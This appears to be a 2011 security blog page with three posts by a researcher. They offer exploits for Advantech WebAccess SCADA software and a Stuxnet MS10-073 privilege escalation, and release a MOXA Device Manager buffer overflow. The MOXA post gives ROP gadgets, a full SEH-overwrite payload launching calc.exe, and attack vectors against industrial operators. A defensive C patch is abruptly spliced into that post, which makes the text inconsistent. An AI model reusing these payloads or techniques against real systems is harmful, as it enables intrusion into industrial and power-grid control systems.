Reversemode
BYTES & WORDS
SCADA Trojans: Attacking the Grid + 0dayZ!
Written by Rubén   
Tuesday, 22 March 2011

Hi!

You can download the slides of the research I presented at RootedCon'11 in Madrid, "SCADA Trojans: Attacking the grid", a journey into attacking the power grid.

I presented:

- 0days in Advantech/BroadWin WebAccess SCADA product
- Weak Design/Vulnerabilities in CSE-Semaphore TBOX RTUs
- General attack against EMS Software via State Estimators.


I contacted ICS-CERT to coordinate with Advantech, but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. It is all a product of your mind.

Well, indeed WebAccess is full of bugs.

It is an RPC exploit against the WebAccess Network Service, port 4592. It leaks the security code that protects the SCADA node, in addition to demonstrating RCE on XP. Slight modifications can be made to support other systems.

I use "RPC heap spray": I mean that any opcode whose parameters have the form "[in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x" can be used to create a fake object and control execution. It could be done in other ways, but this one is funny.

Check the slides, there is more info about the vulns there.

Download Exploit source code

Download Slides [PDF] "SCADA Trojans: Attacking the Grid"



Bye!

Last Updated ( Wednesday, 23 March 2011 )
Stuxnet MS10-073/CVE-2010-2743 Exploit
Written by Rubén   
Thursday, 13 January 2011

Hi everyone,

To inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges on XP/2K boxes. It is stored in resource 250, XORed; can you guess the key? ;)

After performing several paranoid checks to avoid unsuccessful exploitation (elaborated by VUPEN), the party starts...

The vulnerability has already been explained, so just a couple of notes on Resource250.dll:


.text:10001082                 test    si, si
.text:10001085                 jnz     short loc_100010A9
.text:10001087                 push    [ebp+var_4]
.text:1000108A                 lea     eax, [ebp+var_44]
.text:1000108D                 push    eax
.text:1000108E                 call    GoGoGo

...
.text:10002A48                 lea     eax, [ebp+var_218]
.text:10002A4E                 push    eax
.text:10002A4F                 lea     eax, [ebp+var_8]
.text:10002A52                 push    eax
.text:10002A53                 push    edi
.text:10002A54                 call    CreateFakeKbdLayoutFile
  
Stuxnet creates a temporary file and writes into it a minimalistic fake Keyboard Layout DLL, built to be swallowed by win32k!ReadLayoutFile without problems.
.text:10001FC6 loc_10001FC6:                           ; CODE XREF: CreateFakeKbdLayoutFile+CFj
.text:10001FC6                 push    ebx
.text:10001FC7                 lea     eax, [ebp+var_4]
.text:10001FCA                 push    eax
.text:10001FCB                 push    246h
.text:10001FD0                 push    offset unk_1000B058; fake Keyboard Layout Dll
.text:10001FD5                 push    esi
.text:10001FD6                 call    WriteFile
Then it is ready to trigger the vuln and execute the shellcode:
.text:10002A63                 push    [ebp+var_8]
.text:10002A66                 push    edi
.text:10002A67                 push    esi
.text:10002A68                 push    [ebp+arg_0]
.text:10002A6B                 push    [ebp+var_4]
.text:10002A6E                 call    TriggerVuln
...
.text:100027F3                 push    101h       
.text:100027F8                 push    [ebp+var_8]
.text:100027FB                 push    eax
.text:100027FC                 push    [ebp+var_4]
.text:100027FF                 push    1AE0160h
.text:10002804                 push    [ebp+arg_10]
.text:10002807                 call    LoadFakeKBDviaNtUserLoadKeyboardLayoutEx
Finally:
.text:10002839                 push    1Ch
.text:1000283B                 lea     eax, [ebp+var_50]
.text:1000283E                 push    eax
.text:1000283F                 push    ebx
.text:10002840                 mov     [edi+38h], esi
.text:10002843                 call    SendInput
At this point the shellcode is being executed. Every time this code is executed, God breaks something in Natanz.

[+] Download ms10-073-stuxnet.zip
Last Updated ( Thursday, 13 January 2011 )
[0day] MOXA MDM Tool 2.1 Buffer overflow.
Written by Rubén   
Wednesday, 20 October 2010

ICS-CERT has released an alert http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf

Hi there,

The 0day I'm releasing today took exactly 2 minutes to find. Any decent code review or blackbox pentest would have uncovered it, so I assume none happened before the product was released. MOXA is a company of industrial/SCADA products. Two days ago I tweeted the following http://twitter.com/reversemode/status/27770073464 without results, so here we go.


Moxa Device Manager (MDM for short) is an easy-to-use remote management tool for managing Moxa's ready-to-run embedded computers on the Internet. Moxa's embedded computers make excellent front-end computers at remote sites for onsite data collection and industrial control applications. Simply put, MDM makes it easy for system administrators to manage remote computers.
http://www.moxa.com/product/moxa_device_manager.htm

The flaw is a typical binary protocol flaw. Summing it up:

Module: MDMUtil.dll

MDMReceiveMsg->sub_100011A0

readn(s, stack, 4)               // HEADER: payload_size (2 bytes) + function_code (2 bytes)
readn(s, stack+4, payload_size)  // payload_size comes straight from the wire, unchecked
...
switch (function_code)
    case ...:
        strcpy(stack+n, stack+x) // where n >> x
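A bounded version of the receive path sketched above, added here as an example (this is not Moxa's code): the 4-byte header layout follows the sketch, while little-endian field order, a 1024-byte receiver buffer and the function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MDM_HDR_LEN     4
#define MDM_MAX_PAYLOAD 1024   /* assumed size of the receiver's payload buffer */

struct mdm_msg {
    uint16_t payload_size;
    uint16_t function_code;
    char     payload[MDM_MAX_PAYLOAD];
};

/* Stand-in for the readn() pair above: parse one message from bytes already
 * received. Returns 0 on success, -1 when the declared payload_size cannot be
 * trusted (bigger than our buffer, or bigger than what actually arrived). */
int mdm_parse(const uint8_t *buf, size_t len, struct mdm_msg *out)
{
    if (len < MDM_HDR_LEN) return -1;
    uint16_t size = (uint16_t)(buf[0] | (buf[1] << 8));  /* assumed little-endian */
    uint16_t code = (uint16_t)(buf[2] | (buf[3] << 8));
    if (size > MDM_MAX_PAYLOAD) return -1;               /* the check the sketch lacks */
    if ((size_t)size > len - MDM_HDR_LEN) return -1;     /* truncated on the wire */
    out->payload_size  = size;
    out->function_code = code;
    memcpy(out->payload, buf + MDM_HDR_LEN, size);
    return 0;
}

/* Replacement for the per-function-code strcpy(stack+n, stack+x): the string at
 * offset `off` is copied only if its terminator lies inside the received payload
 * and the result fits `dst`. Returns the copied length, or -1. */
int mdm_copy_field(const struct mdm_msg *m, size_t off, char *dst, size_t dstlen)
{
    if (off >= m->payload_size) return -1;
    size_t avail = m->payload_size - off;
    const char *src = m->payload + off;
    const char *nul = memchr(src, '\0', avail);
    if (nul == NULL) return -1;        /* attacker-controlled data without a NUL */
    size_t n = (size_t)(nul - src);
    if (n + 1 > dstlen) return -1;     /* would overrun the destination frame */
    memcpy(dst, src, n + 1);
    return (int)n;
}
```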
The module is compiled with /GS support, so we have to overwrite the SEH handler and then generate an exception. Once the exception occurs, our exploit takes control.

However, the exploit is not 100% reliable: it only works if there are no pages mapped at the address where the thread's stack ends. Otherwise, recv fails, since the kernel-side Windows sockets implementation checks the user-mode buffer before copying the bytes received from the network.

Therefore, we should overwrite a fixed amount of stack, then wait until the inlined strcpy overwrites the SEH handler before triggering the exception when it tries to copy to an invalid address. Moreover, null bytes should be avoided or placed as close as possible to the end of our buffer. The exploit is rather more interesting than the flaw itself.

The ROP exploit uses the following gadgets. This address will be our fake SEH handler:

Module: UTU.dll (Moxa MDM)

.text:1016587E                 add     esp, 838h
.text:10165884                 retn
It will be executed up to 4 times. We need this one to advance, within our buffer, to where our fake stack frames lie. Thus, we can use null bytes :)

Then we push calc.exe onto the stack and get a pointer to it in esi via this gadget:

Module: UTU.dll (Moxa MDM)

.text:1013D50A                 inc     esi
.text:1013D50B                 push    esp ; 'calc.exe'
.text:1013D50C                 pop     esi ;  esi->'calc.exe'
.text:1013D50D                 pop     ebp
.text:1013D50E                 add     esp, 1Ch ; upcoming calls may corrupt calc.exe
.text:1013D511                 retn

.text:100C31C2                 add     esp, 80h
.text:100C31C8                 retn    0Ch
Payload gadget

Module: UTU.dll (Moxa MDM)

.text:1014CD52                 push    esi             ; 'calc.exe'
.text:1014CD53                 call    ds:WinExec

Suicide gadget

Module: MDMTool.exe (Moxa MDM)

.text:00412EE9                 call    ds:GetCurrentProcess
.text:00412EEF                 push    eax             ; hProcess
.text:00412EF0                 call    ds:TerminateProcess
.text:00412EF6                 leave
.text:00412EF7                 retn


Tested on XP since it seems the only Windows version supported by the vendor.

The attack vectors are the following:

* Attacker entices the operator into connecting to a controlled gateway.
* Attacker hacks into the gateway's PC and plants the exploit.
* Attacker uploads a video to youtube. The video shows a kitty that will be executed unless the operator connects to the attacker's gateway.

Note that the Moxa Gateway software is also vulnerable to, at least, DoS attacks... probably RCE as well.

Port: 54321/TCP

Payload:

self.request.send("\x28\x10\x00\x29"
                  +"\x69\x69\x69\x69"*0xCE # pum
                  +"\x7e\x58\x16\x10" #SEH
                  +"\x7e\x58\x16\x10"*0x20E 
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20E
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20E 
                  +"\x7e\x58\x16\x10" 
                  +"\x7e\x58\x16\x10"*0x20e 
                  +"\x0a\xd5\x13\x10"        #gadget #1
                  +"calc.exe"           
                  +"\x00"*20
                  +"\xc2\x31\x0c\x10"*0x80   #gadget #2
                  +"\x52\xCD\x14\x10"*0x10   #gadget #3 WinExec
                  +"\x80\x80\x80\x80"*2
                  +"\xe9\x2e\x41\x00"*0x11C  #gadget #4 TerminateProcess
                  )


I've not notified the vendor because:

+ I am not working for them.
+ They don't have a security contact publicly available.

Thanks to Mario Ceballos of Metasploit for informing me about a vulnerability in Moxa's ActiveX SDK MediaDBPlayback.DLL. It seems that the PlayFileName property is vulnerable to a buffer overflow as well.

Actually, taking a look at the asm, it seems that the difficulty here is not discovering a vulnerability in their products.

Happy hunting!

Last Updated ( Thursday, 21 October 2010 )